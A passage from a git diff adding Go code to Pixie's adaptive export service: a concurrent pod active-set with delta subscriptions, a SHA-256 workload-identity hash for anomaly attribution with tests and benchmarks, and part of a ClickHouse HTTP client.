+ subsMu sync.Mutex + subs []chan Delta +} + +// New returns an empty ActiveSet. +func New() *ActiveSet { + return &ActiveSet{ + members: map[Key]time.Time{}, + } +} + +// Upsert sets or extends a pod's t_end. Idempotent — if the pod is +// already present with a >= t_end, no delta is emitted (caller-side +// dedup of trivial extensions; saves debouncer churn). +// +// `version` is advanced ONLY on membership changes (new pod added). +// A pure t_end extension does NOT bump version — subscribers use +// version skips as their "membership might have changed" signal, and +// spurious bumps force unnecessary re-snapshots. +func (s *ActiveSet) Upsert(k Key, tEnd time.Time) { + s.mu.Lock() + prev, existed := s.members[k] + if existed && !tEnd.After(prev) { + s.mu.Unlock() + return // no-op extension; quietly skip + } + s.members[k] = tEnd + if existed { + // Pure t_end extension: store new value, no version bump, + // no delta. Subscribers see no membership change. + s.mu.Unlock() + return + } + s.version++ + v := s.version + s.mu.Unlock() + s.broadcast(Delta{Added: []Key{k}, Version: v}) +} + +// Remove drops a pod. No-op if not present. Always emits a delta on +// real removals so subscribers can shrink allowlists. +func (s *ActiveSet) Remove(k Key) { + s.mu.Lock() + if _, ok := s.members[k]; !ok { + s.mu.Unlock() + return + } + delete(s.members, k) + s.version++ + v := s.version + s.mu.Unlock() + s.broadcast(Delta{Removed: []Key{k}, Version: v}) +} + +// PruneExpired removes every pod whose t_end is at or before `at`. +// Returns the removed keys for caller-side logging. Emits ONE delta +// containing all removals so subscribers re-evaluate once. 
+func (s *ActiveSet) PruneExpired(at time.Time) []Key { + s.mu.Lock() + var removed []Key + for k, tEnd := range s.members { + if !tEnd.After(at) { + removed = append(removed, k) + delete(s.members, k) + } + } + if len(removed) == 0 { + s.mu.Unlock() + return nil + } + s.version++ + v := s.version + s.mu.Unlock() + s.broadcast(Delta{Removed: removed, Version: v}) + return removed +} + +// Snapshot returns the current set + version atomically. Caller owns +// the returned slice — safe to mutate. Use this on subscription to +// build the initial allowlist before listening for deltas. +func (s *ActiveSet) Snapshot() ([]Key, uint64) { + s.mu.Lock() + defer s.mu.Unlock() + out := make([]Key, 0, len(s.members)) + for k := range s.members { + out = append(out, k) + } + return out, s.version +} + +// Size returns the current membership count (test + metric helper). +func (s *ActiveSet) Size() int { + s.mu.Lock() + defer s.mu.Unlock() + return len(s.members) +} + +// Subscribe returns a channel of deltas. Buffer size sets the +// tolerance for slow consumers; the channel drops oldest deltas on +// overflow and subscribers MUST re-snapshot if they detect a version +// gap. Channel is closed when ctx-equivalent shutdown is signalled +// via Unsubscribe. +// +// Race hazard: a caller that does `Snapshot()` then `Subscribe()` +// can miss any membership change that lands between the two calls. +// Prefer `SubscribeAndSnapshot()` which is atomic. +func (s *ActiveSet) Subscribe(buffer int) <-chan Delta { + if buffer < 1 { + buffer = 1 + } + ch := make(chan Delta, buffer) + s.subsMu.Lock() + s.subs = append(s.subs, ch) + s.subsMu.Unlock() + return ch +} + +// SubscribeAndSnapshot atomically captures the current membership +// AND registers the subscription, so the consumer is guaranteed to +// see EVERY change that lands at or after the returned version +// without losing changes in the race window between the two. 
+// +// Returned tuple: +// +// keys — current membership at snapshot time +// deltas — channel that will receive every future delta +// version — the version of `keys`; consumers can filter the +// channel by `delta.Version > version` +// +// This is the recommended consumer API for bootstrapping. +func (s *ActiveSet) SubscribeAndSnapshot(buffer int) ([]Key, <-chan Delta, uint64) { + if buffer < 1 { + buffer = 1 + } + ch := make(chan Delta, buffer) + // Hold BOTH mutexes for the duration of {snapshot, register}. + // Order: s.mu first (membership), then s.subsMu (subscriber list). + // broadcast() takes only s.subsMu, so there's no ordering risk. + s.mu.Lock() + keys := make([]Key, 0, len(s.members)) + for k := range s.members { + keys = append(keys, k) + } + version := s.version + s.subsMu.Lock() + s.subs = append(s.subs, ch) + s.subsMu.Unlock() + s.mu.Unlock() + return keys, ch, version +} + +// Unsubscribe removes and closes a previously-returned channel. +// Idempotent (no error on unknown chan). +func (s *ActiveSet) Unsubscribe(ch <-chan Delta) { + s.subsMu.Lock() + defer s.subsMu.Unlock() + for i, c := range s.subs { + // compare on the directional alias — Go permits this implicit conversion + if (<-chan Delta)(c) == ch { + s.subs = append(s.subs[:i], s.subs[i+1:]...) + close(c) + return + } + } +} + +// broadcast attempts to send to every subscriber non-blockingly. On +// buffer overflow the OLDEST delta is dropped so the most recent +// state-change always reaches the subscriber (it'll re-snapshot if +// the version gap matters). This is the contract: subscribers MUST +// tolerate dropped deltas + use Snapshot to reconcile. +func (s *ActiveSet) broadcast(d Delta) { + s.subsMu.Lock() + defer s.subsMu.Unlock() + for _, c := range s.subs { + select { + case c <- d: + default: + // Drop oldest by draining one then sending. 
+ select { + case <-c: + default: + } + select { + case c <- d: + default: + } + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go b/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go new file mode 100644 index 00000000000..47ff9ad7c78 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go @@ -0,0 +1,225 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package activeset + +import ( + "sync" + "testing" + "time" +) + +func TestUpsertEmitsAddedDelta(t *testing.T) { + s := New() + ch := s.Subscribe(4) + s.Upsert(Key{Namespace: "ns", Pod: "p1"}, time.Now().Add(5*time.Minute)) + select { + case d := <-ch: + if len(d.Added) != 1 || d.Added[0].Pod != "p1" { + t.Fatalf("expected added=[p1], got %+v", d) + } + case <-time.After(200 * time.Millisecond): + t.Fatalf("no delta") + } +} + +func TestUpsertExtendDoesNotEmitDelta(t *testing.T) { + s := New() + ch := s.Subscribe(4) + k := Key{Namespace: "ns", Pod: "p1"} + t0 := time.Now() + s.Upsert(k, t0.Add(1*time.Minute)) + <-ch // drain initial add + s.Upsert(k, t0.Add(5*time.Minute)) + select { + case d := <-ch: + t.Fatalf("unexpected delta on pure extension: %+v", d) + case <-time.After(100 * time.Millisecond): + // good + } +} + +func TestRemoveEmitsRemovedDelta(t *testing.T) { + s := New() + ch := s.Subscribe(4) + k := Key{Namespace: "ns", Pod: "p1"} + s.Upsert(k, time.Now().Add(1*time.Minute)) + <-ch + s.Remove(k) + select { + case d := <-ch: + if len(d.Removed) != 1 || d.Removed[0].Pod != "p1" { + t.Fatalf("expected removed=[p1], got %+v", d) + } + case <-time.After(200 * time.Millisecond): + t.Fatalf("no delta") + } +} + +func TestPruneExpiredBatchesRemovals(t *testing.T) { + s := New() + ch := s.Subscribe(4) + now := time.Now() + s.Upsert(Key{Pod: "a"}, now.Add(-time.Minute)) // already expired + s.Upsert(Key{Pod: "b"}, now.Add(time.Minute)) // still active + s.Upsert(Key{Pod: "c"}, now.Add(-time.Second)) // already expired + // drain the three add deltas + for i := 0; i < 3; i++ { + <-ch + } + removed := s.PruneExpired(now) + if len(removed) != 2 { + t.Fatalf("expected 2 removals, got %d (%v)", len(removed), removed) + } + select { + case d := <-ch: + if len(d.Removed) != 2 { + t.Fatalf("expected single delta with 2 removals, got %+v", d) + } + case <-time.After(200 * time.Millisecond): + t.Fatalf("no delta from 
PruneExpired") + } +} + +func TestUpsertExtendDoesNotAdvanceVersion(t *testing.T) { + // Per CR feedback (activeset.go:110): pure extension shouldn't + // bump version, because the version is the consumer's "did + // membership change?" signal. Spurious bumps make subscribers + // re-snapshot for nothing. + s := New() + k := Key{Pod: "p"} + s.Upsert(k, time.Now().Add(time.Minute)) + _, v1 := s.Snapshot() + // Extend the SAME pod's t_end repeatedly. + for i := 0; i < 10; i++ { + s.Upsert(k, time.Now().Add(time.Duration(i+2)*time.Minute)) + } + _, v2 := s.Snapshot() + if v2 != v1 { + t.Fatalf("version advanced on pure extension: v1=%d v2=%d", v1, v2) + } + // But a new pod DOES advance. + s.Upsert(Key{Pod: "q"}, time.Now().Add(time.Minute)) + _, v3 := s.Snapshot() + if v3 == v2 { + t.Fatalf("version did NOT advance on new pod add: v=%d", v3) + } +} + +func TestSnapshotReturnsCurrentMembers(t *testing.T) { + s := New() + s.Upsert(Key{Namespace: "n1", Pod: "p1"}, time.Now().Add(time.Minute)) + s.Upsert(Key{Namespace: "n2", Pod: "p2"}, time.Now().Add(time.Minute)) + keys, v := s.Snapshot() + if len(keys) != 2 { + t.Fatalf("expected 2 keys, got %d", len(keys)) + } + if v == 0 { + t.Fatalf("version should have advanced") + } +} + +func TestSubscriberOverflowDropsOldest(t *testing.T) { + s := New() + ch := s.Subscribe(2) // tiny buffer + for i := 0; i < 10; i++ { + s.Upsert(Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + // We expect at most buffer-size deltas to survive — the rest were dropped. 
+ collected := 0 + for { + select { + case <-ch: + collected++ + case <-time.After(50 * time.Millisecond): + if collected == 0 { + t.Fatalf("got zero deltas; broadcast is broken") + } + if collected > 2 { + t.Fatalf("got %d deltas from a 2-buffer channel; drop-oldest broken", collected) + } + return + } + } +} + +// TestSubscribeAndSnapshot_RaceFreeBootstrap — per CR (activeset.go:183): +// a consumer that wants both "initial state" + "all future deltas" +// must be able to do so without missing changes between Snapshot() +// and Subscribe(). Verify the combined helper. +func TestSubscribeAndSnapshot_RaceFreeBootstrap(t *testing.T) { + s := New() + s.Upsert(Key{Pod: "preexisting"}, time.Now().Add(time.Minute)) + + // Simulate a hostile interleaving: between when we'd call Snapshot + // and when we'd call Subscribe, a concurrent Upsert lands. + // Without a combined helper, we'd miss it. The combined helper + // must report the new pod EITHER in the initial set OR in the + // first delta — never lost. + keys, ch, version := s.SubscribeAndSnapshot(4) + // Concurrent upsert AFTER subscription. + go func() { + s.Upsert(Key{Pod: "racy"}, time.Now().Add(time.Minute)) + }() + + if len(keys) != 1 || keys[0].Pod != "preexisting" { + t.Fatalf("initial snapshot wrong: %+v", keys) + } + // Drain delta. 
+ select { + case d := <-ch: + if d.Version <= version { + t.Fatalf("delta version %d <= snapshot version %d", d.Version, version) + } + seen := false + for _, k := range d.Added { + if k.Pod == "racy" { + seen = true + } + } + if !seen { + t.Fatalf("racy pod not in delta added=%v", d.Added) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("no delta within 500ms") + } +} + +func TestConcurrentUpsertsAreSafe(t *testing.T) { + s := New() + var wg sync.WaitGroup + for i := 0; i < 50; i++ { + i := i + wg.Add(1) + go func() { + defer wg.Done() + s.Upsert(Key{Pod: string(rune('a' + (i % 26)))}, time.Now().Add(time.Minute)) + }() + } + wg.Wait() + if s.Size() == 0 { + t.Fatalf("size 0 after 50 concurrent upserts") + } +} + +func TestRenderKey(t *testing.T) { + if got := (Key{Namespace: "n", Pod: "p"}).Render(); got != "n/p" { + t.Fatalf("render = %q, want n/p", got) + } + if got := (Key{Pod: "p"}).Render(); got != "p" { + t.Fatalf("render(no ns) = %q, want p", got) + } +} diff --git a/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel new file mode 100644 index 00000000000..8f0d97ac68c --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel @@ -0,0 +1,34 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "anomaly", + srcs = ["hash.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) + +pl_go_test( + name = "anomaly_test", + srcs = [ + "hash_bench_test.go", + "hash_test.go", + ], + embed = [":anomaly"], +) diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash.go b/src/vizier/services/adaptive_export/internal/anomaly/hash.go new file mode 100644 index 00000000000..0a0bbaac613 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/hash.go @@ -0,0 +1,86 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package anomaly defines the source-agnostic identity of one anomaly +// observation: a four-field Target and the deterministic AnomalyHash +// derived from it. +// +// AnomalyHash is the join key written by the operator into +// forensic_db.adaptive_attribution and joined against pixie observation +// tables on (hostname, namespace, pod, time_). +// +// The hash is workload-identity, NOT event-identity: it carries no +// timestamp and no rule id. The same workload firing N anomalies +// produces N kubescape rows, all collapsing to the same hash. 
This +// makes the hash a meaningful partition / join key. +package anomaly + +import ( + "crypto/sha256" + "encoding/binary" + "encoding/hex" +) + +// AnomalyHash is the 32-hex-character (16-byte) join key derived from +// a Target. Same Target → same AnomalyHash, every time. +type AnomalyHash string + +// Target is the workload-identity used for hashing. Pod and Namespace +// MAY be empty (host-pid processes outside any pod). PID + Comm are +// always required by the producer; the hash function does not enforce +// that — extraction is the place to enforce. +// +// Note: timestamp and rule id deliberately not in the hash. Different +// rule firings on the same workload share the same hash; the time +// dimension is carried separately in the attribution row's +// (t_start, t_end) interval. +type Target struct { + PID uint64 + Comm string + Pod string // may be empty + Namespace string // may be empty +} + +// Hash returns the deterministic 32-hex-character AnomalyHash for the +// given Target. SHA-256 over a length-prefixed canonical encoding of +// the four identity fields, truncated to the leading 16 bytes +// (32 hex chars). 128 collision bits suffice for the workload +// cardinality envelope. +// +// The encoding is: PID as big-endian uint64, followed by each string +// as uint32-LE length || bytes. Length prefixing is collision-safe +// across delimiter-bearing or empty inputs (a plain ":"-join is not — +// e.g. {Pod:"a:b", NS:""} would collide with {Pod:"a", NS:"b:"}). +func Hash(t Target) AnomalyHash { + h := sha256.New() + var pidBuf [8]byte + binary.BigEndian.PutUint64(pidBuf[:], t.PID) + h.Write(pidBuf[:]) + writeLenPrefixed(h, t.Comm) + writeLenPrefixed(h, t.Pod) + writeLenPrefixed(h, t.Namespace) + sum := h.Sum(nil) + return AnomalyHash(hex.EncodeToString(sum[:16])) +} + +// writeLenPrefixed writes uint32-LE length followed by the raw bytes. +// 4 GiB per field is well above any realistic Pod/Namespace/Comm size. 
+func writeLenPrefixed(h interface{ Write([]byte) (int, error) }, s string) { + var lenBuf [4]byte + binary.LittleEndian.PutUint32(lenBuf[:], uint32(len(s))) + _, _ = h.Write(lenBuf[:]) + _, _ = h.Write([]byte(s)) +} diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go b/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go new file mode 100644 index 00000000000..74d0e8d0b75 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go @@ -0,0 +1,119 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package anomaly + +import ( + "fmt" + "sync/atomic" + "testing" +) + +// anomaly.Hash sits on the HOTTEST path in AE: it runs for every +// kubescape event the trigger fans into the controller. At ~1k +// events/sec on a busy cluster, that's 1k Hash() calls/sec PLUS the +// kubescape extraction allocations on each upstream Row. +// +// These benchmarks establish the per-call cost. The fields are sized +// to match real workloads: Pod is the standard 51-char k8s name, +// Namespace ~20 chars, Comm 16 chars (max kernel limit). 
+ +func benchTarget(i int) Target { + return Target{ + PID: uint64(1000 + i), + Comm: "java", + Pod: "backend-vulnerable-779cd9d765-mxr8t-replica-shard-9", + Namespace: "log4j-poc-production", + } +} + +func BenchmarkHash(b *testing.B) { + t := benchTarget(0) + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _ = Hash(t) + } +} + +// BenchmarkHash_Unique varies the PID each iteration. Establishes +// what the hash costs when the inputs aren't shared across calls (so +// no CPU caching shortcut on the input bytes). +func BenchmarkHash_Unique(b *testing.B) { + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _ = Hash(benchTarget(i)) + } +} + +// BenchmarkHash_LongNamespace pumps the fields to their realistic +// upper bound (256-char Pod, 63-char namespace per k8s DNS limits). +// Shows whether the SHA-256 step or the writeLenPrefixed allocations +// dominate. +func BenchmarkHash_LongFields(b *testing.B) { + t := Target{ + PID: 12345, + Comm: "very-long-process-name-near-kernel-limit-16chrs!", + Pod: "extremely-long-statefulset-pod-name-with-replica-suffix-and-shard-suffix-pushing-the-k8s-253-char-dns-limit-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + Namespace: "production-tenant-namespace-63-chars-aaaaaaaaaaaaaaaaaaaaaaaaa", + } + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _ = Hash(t) + } +} + +// BenchmarkHash_Parallel measures contention under GOMAXPROCS +// goroutines computing hashes in parallel. AE on a busy cluster has +// 11 BatchWriter + 11 TableScanner streaming goroutines plus the +// controller fan-out; if Hash's sha256.New() or its hex.EncodeToString +// hit a shared allocator pool, parallel speedup will collapse. 
+func BenchmarkHash_Parallel(b *testing.B) { + b.ReportAllocs() + b.ResetTimer() + var i atomic.Uint64 + b.RunParallel(func(pb *testing.PB) { + for pb.Next() { + _ = Hash(benchTarget(int(i.Add(1)))) + } + }) +} + +// BenchmarkHash_KubescapeReplay simulates the trigger-controller +// fan-out: drain a batch of 10k events (the configured PollLimit +// default) by hashing each one's target. Measures the per-batch +// hash cost — call once per trigger poll on a busy cluster. +func BenchmarkHash_KubescapeReplay(b *testing.B) { + const batch = 10_000 + targets := make([]Target, batch) + for i := range targets { + targets[i] = Target{ + PID: uint64(1000 + i), + Comm: fmt.Sprintf("proc-%d", i%64), + Pod: fmt.Sprintf("backend-%d-7bdf99c466-replica-%d", i%32, i%4), + Namespace: fmt.Sprintf("ns-%d", i%8), + } + } + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + for j := range targets { + _ = Hash(targets[j]) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go new file mode 100644 index 00000000000..360f3422928 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go @@ -0,0 +1,140 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package anomaly + +import ( + "reflect" + "testing" +) + +// canonical fixture: redis CVE-2025-49844 R1005 alert (workload identity only). +var canonicalTarget = Target{ + PID: 106040, + Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", + Namespace: "redis", +} + +// TestHash_Deterministic — same Target hashes identically every call. +func TestHash_Deterministic(t *testing.T) { + a := Hash(canonicalTarget) + b := Hash(canonicalTarget) + if a != b { + t.Fatalf("not deterministic: %q vs %q", a, b) + } + if got := len(a); got != 32 { + t.Fatalf("len %d, want 32 hex chars", got) + } +} + +// TestHash_DiffersOnPID — two processes on the same pod still hash differently +// (we want PER-process attribution). +func TestHash_DiffersOnPID(t *testing.T) { + other := canonicalTarget + other.PID = canonicalTarget.PID + 1 + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on PID change") + } +} + +// TestHash_DiffersOnComm — different comm under same PID/pod/ns must differ. +func TestHash_DiffersOnComm(t *testing.T) { + other := canonicalTarget + other.Comm = "redis-cli" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Comm change") + } +} + +// TestHash_DiffersOnPod — different replicas of same workload differ. +func TestHash_DiffersOnPod(t *testing.T) { + other := canonicalTarget + other.Pod = "redis-578d5dc9bd-OTHER" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Pod change") + } +} + +// TestHash_DiffersOnNamespace — same pod name in different ns must differ. +func TestHash_DiffersOnNamespace(t *testing.T) { + other := canonicalTarget + other.Namespace = "redis-staging" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Namespace change") + } +} + +// TestHash_AllowsEmptyPod — host-pid processes have no pod/namespace. +// Hash must still be computable and stable. 
+func TestHash_AllowsEmptyPod(t *testing.T) { + host := Target{PID: 1, Comm: "systemd"} + a := Hash(host) + b := Hash(host) + if a != b { + t.Fatalf("empty-pod hash not deterministic") + } + if len(a) != 32 { + t.Fatalf("empty-pod hash len %d", len(a)) + } + // empty-pod target must collide with itself but not with the + // non-empty-pod canonical target. + if a == Hash(canonicalTarget) { + t.Fatalf("empty-pod hash collides with named-pod hash") + } +} + +// TestHash_NoTimestampInfluence — verifies the hash function takes only +// the four identity fields. (No EventTime / RuleID parameter exists.) +// This is a structural test: the Target struct has exactly 4 fields, +// all part of the canonical form. If you add a field, you must decide +// whether it belongs in the hash and update this test. +func TestHash_NoTimestampInfluence(t *testing.T) { + // Pin the shape so adding a new field (even at zero value) makes + // this test fail loudly. CR feedback: an equality-of-two-equal- + // constructions check would pass even when a new field is added, + // so we also assert the type's field count. + const wantFields = 4 + if got := reflect.TypeOf(Target{}).NumField(); got != wantFields { + t.Fatalf("Target field count = %d, want %d; decide whether the new "+ + "field belongs in the canonical hash form (update Hash + this guard)", + got, wantFields) + } + a := Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"} + if Hash(a) != Hash(Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"}) { + t.Fatalf("Target hash leaks an unrecognised field") + } +} + +// TestHash_NoDelimiterCollision — naive ":"-joined canonical forms +// collide when input values can contain ":" or be empty. The fix is a +// length-prefixed (or otherwise delimiter-safe) encoding before hashing. +// Without that fix, the two Targets below produce the same canonical +// string and therefore the same hash. 
+func TestHash_NoDelimiterCollision(t *testing.T) { + a := Target{PID: 0, Comm: "", Pod: "a:b", Namespace: ""} + b := Target{PID: 0, Comm: "", Pod: "a", Namespace: "b:"} + if Hash(a) == Hash(b) { + t.Fatalf("delimiter collision: %+v and %+v hash to the same value (%s)", + a, b, Hash(a)) + } + c := Target{PID: 0, Comm: "x:y", Pod: "", Namespace: ""} + d := Target{PID: 0, Comm: "x", Pod: "y:", Namespace: ""} + if Hash(c) == Hash(d) { + t.Fatalf("delimiter collision: %+v and %+v hash to the same value (%s)", + c, d, Hash(c)) + } +} diff --git a/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel b/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel new file mode 100644 index 00000000000..a52c1c89c32 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel @@ -0,0 +1,31 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "chhttp", + srcs = ["chhttp.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) + +pl_go_test( + name = "chhttp_test", + srcs = ["chhttp_test.go"], + embed = [":chhttp"], +) diff --git a/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go b/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go new file mode 100644 index 00000000000..d96b784c7e7 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go @@ -0,0 +1,232 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package chhttp is the one HTTP client every AE-internal package uses to +// talk to ClickHouse's HTTP interface (port 8123 by default). Previously +// the same client was reimplemented three times (clickhouse.Applier, +// sink.ClickHouseHTTP, trigger.ClickHouseWatermarkStore) with subtly +// different endpoint validation, timeout defaults and error-extraction +// logic; this package collapses that to a single implementation. 
// DefaultTimeout is the HTTP client timeout New applies when the caller
// passes timeout <= 0.
const DefaultTimeout = 30 * time.Second

// Client is a minimal ClickHouse HTTP client. Its fields are set once in
// New and never mutated afterwards, so it is safe for concurrent use.
type Client struct {
	endpoint string       // validated base URL with trailing slashes removed
	user     string       // basic-auth user; empty means no auth header is sent
	pass     string       // basic-auth password, used only when user is set
	hc       *http.Client // shared client carrying the configured timeout
}

// New validates endpoint and returns a ready Client.
//
// endpoint must be an absolute http or https URL with a host and without
// any query string or fragment, because request URLs are built by
// appending "/?query=…" to it. Trailing slashes are stripped so that
// concatenation never produces "//". timeout <= 0 selects DefaultTimeout.
//
// An error is returned for an empty, unparsable, non-http(s), host-less
// endpoint, or one that contains "?" or "#".
func New(endpoint, user, pass string, timeout time.Duration) (*Client, error) {
	if endpoint == "" {
		return nil, fmt.Errorf("chhttp: empty endpoint")
	}
	u, err := url.Parse(endpoint)
	if err != nil {
		return nil, fmt.Errorf("chhttp: invalid endpoint %q: %w", endpoint, err)
	}
	if (u.Scheme != "http" && u.Scheme != "https") || u.Host == "" {
		return nil, fmt.Errorf("chhttp: endpoint must be an absolute http(s) URL: %q", endpoint)
	}
	// url.Parse leaves RawQuery and Fragment empty for a bare trailing "?"
	// or "#" (e.g. "http://h:8123/?"), yet such an endpoint would still
	// corrupt every URL built as endpoint+"/?query=…". A valid base URL
	// never contains either delimiter, so reject them outright.
	if u.RawQuery != "" || u.Fragment != "" || strings.ContainsAny(endpoint, "?#") {
		return nil, fmt.Errorf("chhttp: endpoint must not include query parameters or a fragment: %q", endpoint)
	}
	if timeout <= 0 {
		timeout = DefaultTimeout
	}
	return &Client{
		endpoint: strings.TrimRight(endpoint, "/"),
		user:     user,
		pass:     pass,
		hc:       &http.Client{Timeout: timeout},
	}, nil
}

// Endpoint returns the validated, slash-trimmed base URL. It is handy as
// a log field identifying which ClickHouse the client targets.
func (c *Client) Endpoint() string { return c.endpoint }
+func (c *Client) Exec(ctx context.Context, sql string) ([]byte, error) { + return c.do(ctx, http.MethodPost, c.endpoint+"/", strings.NewReader(sql), "") +} + +// Query GETs sql via ?query= so it shows up greppable in CH's query log. +// Use for SELECT — the body is whatever FORMAT was requested. Buffers +// the entire response in memory; for large result sets prefer +// QueryStream. +func (c *Client) Query(ctx context.Context, sql string) ([]byte, error) { + q := url.Values{} + q.Set("query", sql) + return c.do(ctx, http.MethodGet, c.endpoint+"/?"+q.Encode(), nil, "") +} + +// QueryStream GETs sql like Query, but returns the response body as an +// io.ReadCloser the caller drains incrementally. Use for SELECTs whose +// result set is unbounded (e.g. an active-set rehydrate that may be +// multi-MB). Caller MUST Close the returned body, even on error. +func (c *Client) QueryStream(ctx context.Context, sql string) (io.ReadCloser, error) { + q := url.Values{} + q.Set("query", sql) + req, err := http.NewRequestWithContext(ctx, http.MethodGet, c.endpoint+"/?"+q.Encode(), nil) + if err != nil { + return nil, err + } + if c.user != "" { + req.SetBasicAuth(c.user, c.pass) + } + resp, err := c.hc.Do(req) + if err != nil { + return nil, err + } + if resp.StatusCode/100 != 2 { + msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + resp.Body.Close() + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(msg))) + } + return resp.Body, nil +} + +// InsertOptions tunes one Insert call. +type InsertOptions struct { + // ContentType sets the HTTP Content-Type. Defaults to + // "application/x-ndjson" when empty (matches FORMAT JSONEachRow). + ContentType string + // FailLoud, when 